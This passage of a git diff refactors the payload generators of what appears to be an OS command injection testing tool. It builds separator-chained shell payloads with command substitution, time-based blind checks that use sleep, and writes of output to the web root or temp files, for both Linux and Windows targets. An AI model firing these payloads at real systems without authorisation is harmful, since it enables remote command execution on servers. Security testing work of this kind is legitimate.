settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) separator = _urllib.parse.unquote(separator) @@ -548,9 +531,8 @@ def fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, htt elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print($(echo $(" + cmd + ")))\n\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + ")))\n\") ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) else: diff --git a/src/core/injections/controller/checks.py b/src/core/injections/controller/checks.py index 2a8ddf9d21..edebe80b42 100755 --- a/src/core/injections/controller/checks.py +++ b/src/core/injections/controller/checks.py @@ -1502,6 +1502,8 @@ def tamper_scripts(stored_tamper_scripts): if "hexencode" or "base64encode" == script: settings.MULTI_ENCODED_PAYLOAD.append(script) import_script = str(settings.TAMPER_SCRIPTS_PATH + script + ".py").replace("/",".").split(".py")[0] + if not stored_tamper_scripts: + settings.print_data_to_stdout(settings.SUB_CONTENT_SIGN + import_script.split(".")[-1]) warn_msg = "" if settings.EVAL_BASED_STATE != False and script in settings.EVAL_NOT_SUPPORTED_TAMPER_SCRIPTS: warn_msg = "The dynamic code evaluation technique does " @@ -1509,13 +1511,15 @@ def tamper_scripts(stored_tamper_scripts): warn_msg = "Windows targets do " elif settings.TARGET_OS != settings.OS.WINDOWS and script in settings.UNIX_NOT_SUPPORTED_TAMPER_SCRIPTS: warn_msg = "Unix-like targets do " + elif "backticks" == script and menu.options.alter_shell: + warn_msg = "Option '--alter-shell' " if len(warn_msg) != 0: if not stored_tamper_scripts: warn_msg = warn_msg + "not support the usage of '" + script + ".py'. Skipping tamper script." settings.print_data_to_stdout(settings.print_warning_msg(warn_msg)) else: - if not stored_tamper_scripts: - settings.print_data_to_stdout(settings.SUB_CONTENT_SIGN + import_script.split(".")[-1]) + # if not stored_tamper_scripts: + # settings.print_data_to_stdout(settings.SUB_CONTENT_SIGN + import_script.split(".")[-1]) try: module = __import__(import_script, fromlist=[None]) if not hasattr(module, "__tamper__"): diff --git a/src/core/injections/controller/controller.py b/src/core/injections/controller/controller.py index 801b885cc3..f892e9b8bb 100644 --- a/src/core/injections/controller/controller.py +++ b/src/core/injections/controller/controller.py @@ -40,6 +40,26 @@ Checks if the testable parameter is exploitable. """ +""" +Heuristic basic checks payloads generator +""" +def basic_payload_generator(): + suffix = "" + if settings.USE_BACKTICKS: + prefix = "expr " + else: + prefix = "(" + suffix = ")" + settings.BASIC_STRING = prefix + settings.CALC_STRING + suffix + settings.BASIC_COMMAND_INJECTION_PAYLOADS = [";echo " + settings.CMD_SUB_PREFIX + settings.BASIC_STRING + settings.CMD_SUB_SUFFIX + + "%26echo " + settings.CMD_SUB_PREFIX + settings.BASIC_STRING + settings.CMD_SUB_SUFFIX + + "|echo " + settings.CMD_SUB_PREFIX + settings.BASIC_STRING + settings.CMD_SUB_SUFFIX + + settings.RANDOM_STRING_GENERATOR, + "|set /a " + settings.BASIC_STRING + "%26set /a " + settings.BASIC_STRING + ] +""" +Initializing basic level check status +""" def basic_level_checks(): settings.TIME_RELATIVE_ATTACK = False settings.SKIP_CODE_INJECTIONS = None @@ -134,13 +154,15 @@ def heuristic_request(url, http_request_method, check_parameter, payload, whites """ def command_injection_heuristic_basic(url, http_request_method, check_parameter, the_type, header_name, inject_http_headers): check_parameter = check_parameter.lstrip().rstrip() + checks.perform_payload_modification(payload="") + basic_payload_generator() if menu.options.alter_shell: basic_payloads = settings.ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS else: basic_payloads = settings.BASIC_COMMAND_INJECTION_PAYLOADS settings.CLASSIC_STATE = True try: - checks.perform_payload_modification(payload="") + # checks.perform_payload_modification(payload="") for whitespace in settings.WHITESPACES: if not settings.IDENTIFIED_COMMAND_INJECTION: _ = 0 @@ -735,12 +757,6 @@ def do_check(url, http_request_method, filename): warn_msg += "time-based injections because of inherent high latency time." settings.print_data_to_stdout(settings.print_warning_msg(warn_msg)) - # Check for "backticks" tamper script. - if settings.USE_BACKTICKS == True: - if not menu.options.tech or "e" in menu.options.tech or "t" in menu.options.tech or "f" in menu.options.tech: - warn_msg = "Commands substitution using backtics is only supported by the (results-based) classic command injection technique. " - settings.print_data_to_stdout(settings.print_warning_msg(warn_msg)) - perform_checks(url, http_request_method, filename) # All injection techniques seems to be failed! diff --git a/src/core/injections/controller/handler.py b/src/core/injections/controller/handler.py index e199fa3a74..6d03cf211d 100755 --- a/src/core/injections/controller/handler.py +++ b/src/core/injections/controller/handler.py @@ -311,15 +311,15 @@ def do_time_relative_proccess(url, timesec, filename, http_request_method, url_t if settings.TARGET_OS == settings.OS.WINDOWS: if alter_shell: - if technique == settings.INJECTION_TECHNIQUE.TIME_BASED: - cmd = settings.WIN_PYTHON_INTERPRETER + "python.exe -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" - else: - cmd = settings.WIN_PYTHON_INTERPRETER + " -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" + # if technique == settings.INJECTION_TECHNIQUE.TIME_BASED: + # cmd = settings.WIN_PYTHON_INTERPRETER + "python.exe -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" + # else: + cmd = settings.WIN_PYTHON_INTERPRETER + " -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" else: rand_num = randv1 + randv2 cmd = "powershell.exe -InputFormat none write (" + str(rand_num) + ")" else: - if technique == settings.INJECTION_TECHNIQUE.TIME_BASED: + if technique == settings.INJECTION_TECHNIQUE.TIME_BASED or technique == settings.INJECTION_TECHNIQUE.TEMP_FILE_BASED: cmd = "expr " + str(randv1) + " %2B " + str(randv2) + "" else: cmd = "echo $((" + str(randv1) + " %2B " + str(randv2) + "))" diff --git a/src/core/injections/results_based/techniques/classic/cb_payloads.py b/src/core/injections/results_based/techniques/classic/cb_payloads.py index 0b8fbba36c..58bf283136 100755 --- a/src/core/injections/results_based/techniques/classic/cb_payloads.py +++ b/src/core/injections/results_based/techniques/classic/cb_payloads.py @@ -36,44 +36,22 @@ def decision(separator, TAG, randv1, randv2): "\"') do @set /p = " + TAG + "%i" + TAG + TAG + settings.CMD_NUL ) else: - if not settings.WAF_ENABLED: - if settings.USE_BACKTICKS: - math_calc = "`expr " + str(randv1) + " %2B " + str(randv2) + "`" - else: - math_calc = "$((" + str(randv1) + "%2B" + str(randv2) + "))" + if settings.USE_BACKTICKS or settings.WAF_ENABLED: + math_calc = settings.CMD_SUB_PREFIX + "expr " + str(randv1) + " %2B " + str(randv2) + settings.CMD_SUB_SUFFIX else: - if settings.USE_BACKTICKS: - math_calc = "`expr " + str(randv1) + " %2B " + str(randv2) + "`" - else: - math_calc = "$(expr " + str(randv1) + " %2B " + str(randv2) + ")" + math_calc = settings.CMD_SUB_PREFIX + "(" + str(randv1) + "%2B" + str(randv2) + "))" if settings.SKIP_CALC: - if settings.USE_BACKTICKS: - payload = (separator + - "echo " + TAG + - TAG + "" + TAG + "" + - separator - ) - else: - payload = (separator + - "echo " + TAG + - "$(echo " + TAG + ")" + TAG + "" + - separator - ) + payload = (separator + + "echo " + TAG + + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX + TAG + ) else: - if settings.USE_BACKTICKS: - payload = (separator + - "echo " + TAG + - math_calc + - TAG + "" + TAG + "" - ) - else: - payload = (separator + - "echo " + TAG + - math_calc + - "$(echo " + TAG + ")" + TAG + "" + - separator - ) + payload = (separator + + "echo " + TAG + + math_calc + + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX + TAG + ) return payload """ @@ -96,16 +74,14 @@ def decision_alter_shell(separator, TAG, randv1, randv2): payload = (separator + settings.LINUX_PYTHON_INTERPRETER + " -c \"print('" + TAG + TAG + - TAG + "')\"" + - separator + TAG + "')\"" ) else: payload = (separator + settings.LINUX_PYTHON_INTERPRETER + " -c \"print('" + TAG + "'%2Bstr(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))" + "%2B'" + TAG + "'%2B'" + - TAG + "')\"" + - separator + TAG + "')\"" ) return payload @@ -126,25 +102,13 @@ def cmd_execution(separator, TAG, cmd): ) else: settings.USER_APPLIED_CMD = cmd - if settings.USE_BACKTICKS: - cmd_exec = "`" + cmd + "`" - payload = (separator + - "echo " + TAG + - "" + TAG + "" + - cmd_exec + - "" + TAG + "" + TAG + "" + - separator - ) - else: - cmd_exec = "$(" + cmd + ")" - payload = (separator + - "echo " + TAG + - "$(echo " + TAG + ")" + - cmd_exec + - "$(echo " + TAG + ")" + TAG + "" + - separator - ) - + cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + payload = (separator + + "echo " + TAG + + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX + + cmd_exec + + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX + TAG + ) return payload """ @@ -164,23 +128,14 @@ def cmd_execution_alter_shell(separator, TAG, cmd): TAG + TAG + " $(" + cmd + ") "+ TAG + TAG + "')\"" + "') do @set /p=%i " + settings.CMD_NUL ) - else: - - if settings.USE_BACKTICKS: - payload = (separator + - settings.LINUX_PYTHON_INTERPRETER + - " -c \"print('" + TAG + "'%2B'" + TAG + "'%2B'$(echo `" + cmd + ")`" + - TAG + "'%2B'" + TAG + "')\"" + - separator - ) - else: - payload = (separator + - settings.LINUX_PYTHON_INTERPRETER + - " -c \"print('" + TAG + "'%2B'" + TAG + "'%2B'$(echo $(" + cmd + "))'%2B'" + - TAG + "'%2B'" + TAG + "')\"" + - separator - ) + settings.USER_APPLIED_CMD = cmd + cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + payload = (separator + + settings.LINUX_PYTHON_INTERPRETER + + " -c \"print('" + TAG + "'%2B'" + TAG + "'%2B'" + settings.CMD_SUB_PREFIX + "echo " + cmd_exec + settings.CMD_SUB_SUFFIX + "'%2B'" + + TAG + "'%2B'" + TAG + "')\"" + ) return payload # eof diff --git a/src/core/injections/semiblind/techniques/file_based/fb_payloads.py b/src/core/injections/semiblind/techniques/file_based/fb_payloads.py index 4699b32c30..cafa7d2664 100755 --- a/src/core/injections/semiblind/techniques/file_based/fb_payloads.py +++ b/src/core/injections/semiblind/techniques/file_based/fb_payloads.py @@ -35,8 +35,7 @@ def decision(separator, TAG, OUTPUT_TEXTFILE): ) else: payload = (separator + - "echo " + TAG + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE + - separator + "echo " + TAG + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE ) return payload @@ -45,7 +44,6 @@ def decision(separator, TAG, OUTPUT_TEXTFILE): __Warning__: The alternative shells are still experimental. """ def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE): - if settings.TARGET_OS == settings.OS.WINDOWS: python_payload = settings.WIN_PYTHON_INTERPRETER + " -c \"open('" + OUTPUT_TEXTFILE + "','w').write('" + TAG + "')\"" payload = (separator + @@ -55,7 +53,7 @@ def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE): ) else: payload = (separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + TAG + "')\nf.close()\n\")" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + TAG + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX ) if settings.USER_AGENT_INJECTION == True or \ @@ -87,8 +85,7 @@ def cmd_execution(separator, cmd, OUTPUT_TEXTFILE): else: settings.USER_APPLIED_CMD = cmd payload = (separator + - cmd + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE + - separator + cmd + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE ) return payload @@ -110,7 +107,8 @@ def cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE): ) else: payload = (separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('$(echo $(" + cmd + "))')\nf.close()\n\")" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX ) # New line fixation diff --git a/src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py b/src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py index 74343e6445..f8101c6335 100755 --- a/src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py +++ b/src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py @@ -37,8 +37,8 @@ def decision(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_request_method): "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.WIN_FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + settings.SINGLE_WHITESPACE + "'" + TAG + "'" + ampersand + @@ -51,30 +51,28 @@ def decision(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_request_method): else: if separator == ";" or separator == "%0a" : payload = (separator + - "str=$(echo " + TAG + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + ")" + separator + - "str=$(cat " + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + + "str=" + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output. - "str1=$(expr length \"$str\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + #"str1=${%23str}" + separator + "if [ " + str(j) + " -ne ${str1} ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0" + separator + - "str=$(echo " + TAG + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + ")" + separator + - "str=$(cat " + OUTPUT_TEXTFILE + ")" + separator + - "str1=$(expr length \"$str\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + + "str=" + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + #"str1=${%23str} " + separator + "[ " + str(j) + " -eq ${str1} ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) separator = _urllib.parse.unquote(separator) @@ -83,11 +81,10 @@ def decision(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_request_method): pipe = "|" payload = (pipe + "echo " + TAG + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + pipe + - "[ " + str(j) + " -ne $(cat " + OUTPUT_TEXTFILE + + "[ " + str(j) + " -ne " + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + pipe + "tr -d '\\n'" + pipe + "wc -c) ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) else: pass @@ -107,42 +104,40 @@ def decision_alter_shell(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_reque "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(j) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.WIN_FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + settings.SINGLE_WHITESPACE + "'" + TAG + "'" + ampersand + "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(j) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a" : payload = (separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + TAG + "')\nf.close()\n\")" + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + TAG + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output, using readline(). - "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(j) + " -ne ${str1} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + TAG + "')\nf.close()\n\")" + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + TAG + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output, using readline(). - "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\") " + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\") " + separator + "[ " + str(j) + " -eq ${str1} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " ) separator = _urllib.parse.unquote(separator) @@ -150,11 +145,10 @@ def decision_alter_shell(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_reque elif separator == "||" : pipe = "|" payload = (pipe + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + TAG + "')\nf.close()\n\")" + settings.SINGLE_WHITESPACE + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + TAG + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + settings.SINGLE_WHITESPACE + # Find the length of the output, using readline(). - "[ " + str(j) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " + - separator + "[ " + str(j) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\") ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " ) else: pass @@ -191,8 +185,8 @@ def cmd_execution(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_request_meth "powershell.exe -InputFormat none write-host ([int[]][char[]]([string](cmd /c " + cmd + ")))\"')" + settings.SINGLE_WHITESPACE + "do " + settings.WIN_FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + " '%x'" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c \"" + @@ -210,43 +204,41 @@ def cmd_execution(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_request_meth ) else: - settings.USER_APPLIED_CMD = cmd + if separator == ";" or separator == "%0a" : payload = (separator + - "str=$(" + cmd + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + separator + " tr '\\n' ' ' < " + OUTPUT_TEXTFILE + " )" + separator + + "str=" + settings.CMD_SUB_PREFIX + cmd + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + separator + " tr '\\n' ' ' < " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + "echo $str > " + OUTPUT_TEXTFILE + separator + - "str=$(cat " + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output. - "str1=$(expr length \"$str\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + #"str1=${%23str}" + separator + "if [ " + str(j) + " -ne ${str1} ]" + separator + "then sleep 0 " + separator + "else sleep " + str(timesec) + separator + # Transform to ASCII - "str1=$(od -A n -t d1 < " +OUTPUT_TEXTFILE + ")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "od -A n -t d1 < " +OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + "echo $str1 > " + OUTPUT_TEXTFILE + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0 " + separator + - "str=$(" + cmd + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + separator + " tr -d '\\n'<" + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + cmd + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + separator + " tr -d '\\n'<" + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + "echo $str" + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + separator + - "str=$(cat " + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output. - "str1=$(expr length \"$str\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + #"str1=${%23str}" + separator + "[ " + str(j) + " -eq ${str1} ]" + separator + "sleep " + str(timesec) + separator + # Transform to ASCII - "str1=$(od -A n -t d1<" + OUTPUT_TEXTFILE + ")" + separator + - "echo $str1" + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + - separator + "str1=" + settings.CMD_SUB_PREFIX + "od -A n -t d1<" + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + + "echo $str1" + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE ) separator = _urllib.parse.unquote(separator) @@ -257,10 +249,9 @@ def cmd_execution(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_request_meth cmd = checks.add_command_substitution(cmd) payload = (pipe + cmd + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + pipe + - "[ " + str(j) + " -ne $(cat " + OUTPUT_TEXTFILE + pipe + + "[ " + str(j) + " -ne " + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + pipe + "tr -d '\\n'" + pipe + "wc -c) ]" + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) else: pass @@ -282,11 +273,11 @@ def cmd_execution_alter_shell(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_ "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(j) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c " + @@ -295,32 +286,30 @@ def cmd_execution_alter_shell(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_ "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(j) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a" : payload = (separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('$(echo $(" + cmd + "))')\nf.close()\n\")" + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output, using readline(). - "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(j) + " -ne ${str1} ] " + separator + - "then $(" + 